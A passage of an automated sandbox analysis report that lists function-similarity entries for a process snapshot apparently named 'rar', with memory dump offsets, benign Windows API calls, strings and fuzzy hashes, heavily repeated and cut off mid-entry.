                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1557788787-0
                                                                                                                                                                                                                              • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                              • Instruction ID: 706fa81af7bbc066ecea5b28c41690267b8c92ad6ec5c56c8bcffdcd22637d8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4219535F08BD185E720AF12A840269E6E4FB54FE0F884135DE9E63BA4DF7CD4619364
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1171435874-0
                                                                                                                                                                                                                              • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                              • Instruction ID: 350b6fd32b60d0dfd635a9144e37d0e9b91da1dd0abc93ee7f0a7178b823a86a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA113371F18B828AE754AF11A8842BCA2D1FF94B70FA05034C60957686DF2CB8656734
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1447195878-0
                                                                                                                                                                                                                              • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                              • Instruction ID: 0190970493cb31ad1c41c8b5f407eea24a8b724345a72c6ab65de75702c5dd6b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2018028B0D6C247FA987F3196552F8D2D14F487B0F940538DD1E4A7E6ED2CE8216230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 502429940-0
                                                                                                                                                                                                                              • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                              • Instruction ID: 2bacf6ac24e59d2cc3b9644779777c9132cb243b4bb481f16e5296c7a2a0fc3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A118632618E819BE714AF20D944599E370FB85BB0F400231D7AD132A5CF39E475C724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                              • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                              • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                              • Instruction ID: 569a9bc849258d70c32e6398c1af9d0081160fc10ccce213d46172d93464a8ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99914766B093C646EB11AF2991813FCBBD5AB61BE0F448131CA8D4B7D5DA3CE121D321
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF7CF89CBED,?,00000000,?,00007FF7CF8C7A8C), ref: 00007FF7CF8CB730
                                                                                                                                                                                                                              • new.LIBCMT ref: 00007FF7CF8BCFD9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                                                              • String ID: rar$rev
                                                                                                                                                                                                                              • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                              • Opcode ID: 49267c968bf48376f8bb62a9904bbec435c53818402eee37bb5d47bcb8d29714
                                                                                                                                                                                                                              • Instruction ID: e3a29b5a57e8acf63b6e403aa91f1383fd4f08b06707e496e0267142a5667bab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49267c968bf48376f8bb62a9904bbec435c53818402eee37bb5d47bcb8d29714
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93A19C23A096D292EA24EF20C8542FDE3E5FB447A4F854071DE5D0B6D6EE2CE565E330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: *
                                                                                                                                                                                                                              • API String ID: 3215553584-163128923
                                                                                                                                                                                                                              • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                              • Instruction ID: 792048986c51b6c6864ea0ff2b06d601f7bb9dfe00ee55ceb6f226e7ad165d41
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1715E72D09693A6E764AF2480451BCBBE0FF05F6CFA41137DA4A42298DF29D4A1F731
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                              • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                              • Instruction ID: 7648fd30e7afc8ec28ca78a95a56a50911e2b61ebc0b44ff863a079b8e2d04bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94513866B187C246E7259F3599413E9BBD1EB41BA0F88C231C69C8BBD5CF2CD454D720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF7CF8A475B,?,00000000,?,?,00007FF7CF8A4620,?,00000000,?), ref: 00007FF7CF8B4633
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                              • String ID: UNC$\\?\
                                                                                                                                                                                                                              • API String ID: 1611563598-253988292
                                                                                                                                                                                                                              • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                              • Instruction ID: e3b97518364af39ac562b6c050347df41c59656f002e91d64ba7110e488688da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0241A321A086C250FA24BF51EC061F9A3D1AF46BE4FC18131DD6D476D6EE2CE968E230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                              • String ID: System Volume Information\
                                                                                                                                                                                                                              • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                              • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                              • Instruction ID: 9a3908b944e8165898c434f9d41bf5e8b4fa31914be54338c03ab917ba7e6b43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC31C021A196C245EF55AF21A5506FEA7E0AF45BE0F844130EF4D0779ACE3CE4619730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LoadString$fflushswprintf
                                                                                                                                                                                                                              • String ID: %d.%02d$[
                                                                                                                                                                                                                              • API String ID: 1946543793-195111373
                                                                                                                                                                                                                              • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                              • Instruction ID: 82af165efc041a8266c5413618ed3f250e68be7703b6c69581b358bd3dfa8e1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC314D21A096C245FB64BF60E0193F9A3D0AF947A8FC45039D64D0B696DF2CE568D770
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: snprintf
                                                                                                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                                                                                                              • API String ID: 4288800496-834177443
                                                                                                                                                                                                                              • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                              • Instruction ID: faf9577b555ce9a49c27438a52635b55ba199687e40c7a0698029477ce66932a
